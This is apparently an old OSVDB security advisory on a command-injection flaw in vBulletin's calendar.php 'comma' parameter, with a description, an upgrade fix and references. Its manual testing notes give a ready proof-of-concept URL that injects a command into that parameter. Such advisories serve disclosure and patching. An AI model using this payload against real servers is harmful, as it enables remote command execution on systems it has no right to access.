vBulletin calendar.php comma Parameter Arbitrary Command Execution

2002-09-24T00:00:00
ID OSVDB:3299
Type osvdb
Reporter gosper(gosper@nix.org)
Modified 2002-09-24T00:00:00

Description

Vulnerability Description

vBulletin contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the 'calendar.php' script not properly sanitizing user input supplied to the 'comma' variable. By sending a specially crafted request containing shell metacharacters, a remote attacker could execute arbitrary commands resulting in a loss of integrity.

Solution Description

Upgrade to version 2.2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

vBulletin contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the 'calendar.php' script not properly sanitizing user input supplied to the 'comma' variable. By sending a specially crafted request containing shell metacharacters, a remote attacker could execute arbitrary commands resulting in a loss of integrity.

Manual Testing Notes

http://[victim]/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22

References:

Vendor URL: http://www.vbulletin.com/ Other Advisory URL: http://www.securiteam.com/exploits/5QP0P158AC.html ISS X-Force ID: 10176 CVE-2002-1660 CVE-2002-2157 Bugtraq ID: 5820